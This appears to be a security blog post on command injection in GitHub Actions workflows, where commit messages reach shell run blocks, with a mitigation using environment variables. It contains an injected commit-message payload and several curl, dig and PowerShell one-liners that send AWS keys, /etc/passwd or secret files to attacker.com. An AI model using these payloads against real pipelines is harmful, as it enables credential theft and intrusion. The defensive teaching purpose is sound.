CI/CD Hacking: Exfiltrating Data via HTTP GET Requests and Shell Expansion

Listen to this Post

Featured Image
Nothing beats the moment when developers realize that sensitive information can be exfiltrated via HTTP GET requests. This technique is particularly effective in CI/CD pipelines where user-controlled inputs are directly injected into shell commands.

Exploiting Shell Expansion in CI/CD Pipelines

A common vulnerability arises when user-controlled inputs (like github.event.head_commit.message) are inserted directly into a `run` block in GitHub Actions. Shell expansion interprets these inputs as commands, enabling command injection.

Example Attack Payload:

update README.md; curl attacker[.]com?a=$AWS_ACCESS_KEY_ID\&b=$AWS_SECRET_ACCESS_KEY

This commit message would exfiltrate AWS credentials to an attacker-controlled server.

Bypassing GitHub Secrets Masking

GitHub masks secrets displayed in logs when echoed directly, but obfuscation or external exfiltration (e.g., HTTP requests) can bypass this.

Mitigation: Secure Environment Variables

Assign user inputs to environment variables before using them in `run` blocks to prevent shell interpretation:

env: 
GITHUB_MESSAGE: ${{ github.event.head_commit.message }} 
run: | 
echo "Commit message:" 
echo "${GITHUB_MESSAGE}" 

You Should Know: Practical Exploits and Defenses

1. Testing for Command Injection

Use harmless commands to verify injection:

; whoami; 
; id; 

2. Exfiltration Techniques

  • HTTP GET Exfiltration:
    curl http://attacker.com/?leak=$(cat /etc/passwd | base64) 
    
  • DNS Exfiltration:
    dig $(cat /etc/passwd | base64).attacker.com 
    

3. Linux Commands for Debugging CI/CD

  • Check environment variables:
    env 
    printenv 
    
  • Inspect process arguments:
    ps aux 
    

4. Windows Equivalent (PowerShell)

  • Exfiltrate data via HTTP:
    Invoke-WebRequest "http://attacker.com/?data=$(Get-Content C:\secrets.txt | Out-String)" 
    
  • List environment variables:
    Get-ChildItem Env: 
    

5. OWASP CI/CD Top 10 Reference

For deeper learning, explore the OWASP Top 10 CI/CD Security Risks.

What Undercode Say

CI/CD pipelines are prime targets due to misconfigured inputs and excessive permissions. Always:
– Sanitize user inputs.
– Use environment variables for dynamic values.
– Monitor outbound traffic for suspicious HTTP/DNS requests.
– Restrict pipeline permissions to least privilege.

Prediction

As CI/CD adoption grows, attacks leveraging shell expansion and environment misconfigurations will surge. Automation in detection (e.g., static analysis for `run` blocks) will become critical.

Expected Output:

AWS_ACCESS_KEY_ID=AKIAEXAMPLE... 
AWS_SECRET_ACCESS_KEY=EXAMPLEKEY... 

References:

Reported By: Activity 7331406616824549376 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram